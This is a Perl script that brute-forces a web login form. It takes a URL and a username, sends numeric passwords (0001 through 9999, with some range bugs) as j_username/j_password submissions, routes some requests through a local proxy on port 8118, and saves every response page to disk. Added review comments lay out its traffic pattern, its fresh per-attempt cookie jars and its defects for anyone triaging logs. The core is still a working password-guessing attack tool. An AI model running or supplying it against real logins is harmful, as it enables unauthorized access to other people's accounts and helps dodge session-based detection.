#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM
#
# Purpose: given a URL and a username on the command line, submit a login
# form once per numeric password candidate and save every response page to
# "<candidate>.htm" in the current working directory.
#
# What the code below establishes, for anyone reading server logs or
# triaging a host where this ran:
#   * Candidates actually sent, in order: 0001-0009, 0010-0099, 01-09,
#     1000-9999. The loop labelled "100-999" does not match its label.
#   * Each attempt builds a new WWW::Mechanize object with a new, empty
#     cookie jar, so the attempts share no session cookie. Throttling has to
#     key on the account name and/or source address to correlate them.
#   * No User-Agent is set in this file, so requests presumably carry the
#     WWW::Mechanize default agent string - confirm against the installed
#     module version.
#   * Nothing inspects the response: success is never detected here. The
#     visible artifact is the run of NNNN.htm files left on disk.
#   * Only the first loop (candidates 0001-0009) configures a proxy; the
#     other loops connect with the library defaults.
#   * The form fields are j_username / j_password, the conventional names of
#     Java servlet form-based login - presumably the target is such an
#     application; the page does not say.
# A four-digit numeric space is small enough that per-account attempt limits
# or lockout on the server side are what stop this kind of run.
#
# NOTE(review): no "use strict" / "use warnings"; $NumArgs, $host, $user and
# $i are package globals.
use WWW::Mechanize;
use HTTP::Cookies;
# Commented-out alternative: proxy via environment variables.
#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY} = '127.0.0.1:8118';

#Determine the number of arguments the user has given us
$NumArgs = $#ARGV + 1;
if ($NumArgs == 0) {
    #Our user has not entered any information. Display help screen.
    header();
    exit();
}
elsif ($NumArgs == 1) {
    #Our user has only entered some information. Display help screen.
    header();
    exit();
}
# With three or more arguments none of these branches match: the script
# falls through to the final "Audit complete!" print without doing anything.
if ($NumArgs == 2) {
    #Our user has entered enough for an attack. Begin!
    $host = $ARGV[0]; #Host is the first argument supplied
    $user = $ARGV[1]; #Username is the 2nd argument supplied
    #Display header
    # Banner literal kept on one line exactly as it appears in this copy;
    # presumably it spanned several lines before the file was collapsed.
    print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- };
    print "\nYour host is: $host";
    print "\nYour username is: $user";
    print "\n\nThe program will now try bruteforcing the host you selected";
    # Both arguments are used as given: no URL or username validation.
    my $url = $host;
    my $username = $user;

    #1-9 (sent zero-padded as 0001-0009)
    for $i (1 .. 9) {
        print "\nTrying password 000$i...";
        my $outfile = "000" . $i . ".htm";
        my $password = "000" . $i;
        # Fresh client and empty cookie jar per attempt.
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        # Only this loop sets a proxy. Port 8118 is the Privoxy default -
        # presumably a local anonymising proxy; confirm.
        # NOTE(review): the third argument looks surplus for
        # LWP::UserAgent::proxy(schemes, url) - confirm.
        $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/', 'https://127.0.0.1:8118/');
        $mech->get($url);
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        # Two submits per candidate; the reason for the second click is not
        # visible from here.
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        # Two-argument open on a bareword handle, result unchecked: a failed
        # open silently loses the page. $outfile is built only from the loop
        # counter, so the mode-in-filename problem of two-arg open is not
        # reachable here.
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #10-99 (sent zero-padded as 0010-0099; no proxy configured)
    for $i (10 .. 99) {
        print "\nTrying password 00$i...";
        my $outfile = "00" . $i . ".htm";
        my $password = "00" . $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        # Same unchecked two-argument open as in the first loop.
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #100-999
    # NOTE(review): label and code disagree - the range is 1 .. 9 with a
    # single "0" prefix, so the values sent are 01-09 and the files written
    # are 01.htm-09.htm.
    for $i (1 .. 9) {
        print "\nTrying password 0$i...";
        my $outfile = "0" . $i . ".htm";
        my $password = "0" . $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        # Same unchecked two-argument open as in the first loop.
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }

    #1000-9999 (sent without padding)
    for $i (1000 .. 9999) {
        print "\nTrying password $i...";
        my $outfile = $i . ".htm";
        my $password = $i;
        my $mech = WWW::Mechanize->new();
        $mech->cookie_jar(HTTP::Cookies->new());
        $mech->get($url);
        #$mech->form_name('j');
        $mech->field(j_username => $username);
        $mech->field(j_password => $password);
        $mech->click();
        $mech->click();
        my $output_page = $mech->content();
        # Same unchecked two-argument open as in the first loop.
        open(OUTFILE, ">$outfile");
        print OUTFILE "$output_page";
        close(OUTFILE);
        print " Done.";
    }
}
# Printed on every path that reaches this point, including the
# three-or-more-arguments case where no request was made.
print "\n\nAudit complete!";
exit();

# header: print the banner and usage text. Takes no arguments and returns
# whatever print returns; called only when fewer than two arguments are given.
sub header{
    # Literal kept on one line exactly as it appears in this copy.
    print qq{ ---------------------------------------------------------------------- Login Brute-Forcer Custom Built by Juno NBTDOTM ---------------------------------------------------------------------- Usage: GHGbrute -[target site] -[user] Example: GHGbrute somesite.com -admin The program will attempt a numerical bruteforce to four places. };
}